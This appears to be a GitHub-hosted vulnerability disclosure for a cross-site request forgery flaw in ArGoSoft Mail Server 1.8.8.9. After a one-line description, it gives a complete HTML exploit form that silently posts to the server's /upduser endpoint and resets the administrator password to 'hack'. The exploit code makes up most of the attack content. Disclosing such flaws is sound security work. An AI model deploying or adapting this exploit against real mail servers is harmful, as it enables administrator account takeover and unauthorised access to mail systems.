Skip to content
Permalink
master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time

CSRF on ArGoSoft Mail Server 1.8.8.9


About ArGo Soft Mail Server

Website: https://www.argosoft.com/rootpages/MailServer/Default


CSRF on ArGo Soft Mail Server 1.8.8.9

The ArGo Soft Mail Server dashboard does not have protection against attacks of the type Cross Site Request Forgery (CSRF), making it possible to use the exploit below to change the admin password:

<!DOCTYPE html>
<html>
<body>
	<form method="POST" action="http://192.168.56.105:80/upduser">
		<input type="text" name="realname" value="admin">
		<input type="text" name="password" value="hack">
		<input type="text" name="confirmpassword" value="hack">
		<input type="text" name="forwardaddress" value="">
		<input type="text" name="keepcopies" value="N">
		<input type="text" name="returnaddress" value="">
		<input type="text" name="fingerinfo" value="">
		<input type="text" name="respondersubject" value="">
		<input type="text" name="responderdata" value="">
		<input type="submit" value="Send">
	</form>
</body>

a1

a2